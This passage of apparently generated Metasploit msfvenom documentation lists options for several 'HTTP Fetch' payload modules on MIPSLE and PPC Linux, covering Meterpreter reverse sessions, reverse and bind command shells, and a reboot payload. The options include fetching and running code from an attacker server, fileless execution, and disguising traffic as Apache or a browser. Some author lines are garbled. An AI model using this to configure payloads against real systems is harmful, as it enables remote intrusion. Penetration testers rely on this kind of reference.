StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_http:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME gfkVVWTotp no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/mipsle/meterpreter_reverse_https:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME oKPKrTwiNTi no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME cUPPonWYqDQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-reboot.txt
+68
View File
@@ -0,0 +1,68 @@
Name: HTTP Fetch, Linux Reboot
Module: payload/cmd/linux/http/mipsle/reboot
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
rigan - <imrigan@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME HqyjVOMSY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
A very small shellcode for rebooting the system.
This payload is sometimes helpful for testing purposes.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-shell-reverse_tcp.txt
+91
View File
@@ -0,0 +1,91 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsle/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME fHMIGJaY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-shell_bind_tcp.txt
+74
View File
@@ -0,0 +1,74 @@
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/mipsle/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
scut
vaicebine
Vlatko Kosturjak
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME buADmLwtKq no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-mipsle-shell_reverse_tcp.txt
+79
View File
@@ -0,0 +1,79 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/mipsle/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
rigan <imrigan@gmail.com>
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME iVIVTZUyras no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-ppc-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/ppc/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/ppc/meterpreter_reverse_http:
=========================
ent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME wlvJAncdY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an PPC payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
